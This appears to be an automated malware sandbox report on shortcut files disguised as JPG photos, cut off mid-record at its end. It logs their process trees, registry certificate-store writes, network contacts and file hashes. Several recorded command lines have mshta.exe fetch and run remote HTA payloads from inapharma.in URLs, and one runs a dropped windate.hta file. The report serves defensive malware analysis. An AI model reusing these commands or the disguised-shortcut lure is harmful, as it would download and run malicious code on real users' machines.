910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 748 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 748 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 748 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 2032 wrote to memory of 1092 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 2032 wrote to memory of 1092 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 2032 wrote to memory of 1092 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20201220_211940.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20201220_211940

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\ProgramData\Duolingo\windate.hta

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.30.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 104.18.31.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/748-54-0x000007FEFC1F1000-0x000007FEFC1F3000-memory.dmp

memory/2032-91-0x000007FEF3EB0000-0x000007FEF489C000-memory.dmp

memory/2032-92-0x0000000003200000-0x0000000003208000-memory.dmp

memory/2032-93-0x0000000003EE7000-0x0000000003EE8000-memory.dmp

C:\ProgramData\Duolingo\windate.hta

MD5 df0ae835a1dc249c25f56c96a19c63c7
SHA1 388bb0c49057b08a6fc5e7d4fcaab18754650c59
SHA256 7838794872d83079d1a912e0201a76aff8b42404dde2117a5c57a3bb3310d1df
SHA512 d4f538231d4c67407778dbfa6d825c53e59ce70e11a9d8add0e47ee248c0d8b5053285f197e9259af24898e15178a600f5bf852ef3a98258c61c9c67a9898aa8

Analysis: behavioral27

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220311-en

Max time kernel

296s

Max time network

1213s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210628_105339.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1356 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1356 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1356 wrote to memory of 1496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210628_105339.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210628_105339

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.30.182:80 crl.comodoca.com tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.30.182:80 crl.usertrust.com tcp
US 104.18.31.182:80 crl.usertrust.com tcp
US 104.18.31.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/1356-54-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220311-en

Max time kernel

301s

Max time network

1219s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20100510171450.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1788 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1788 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1788 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20100510171450.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image1

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/1788-54-0x000007FEFB561000-0x000007FEFB563000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220310-en

Max time kernel

298s

Max time network

1218s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210111_125841.jpg.lnk

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff3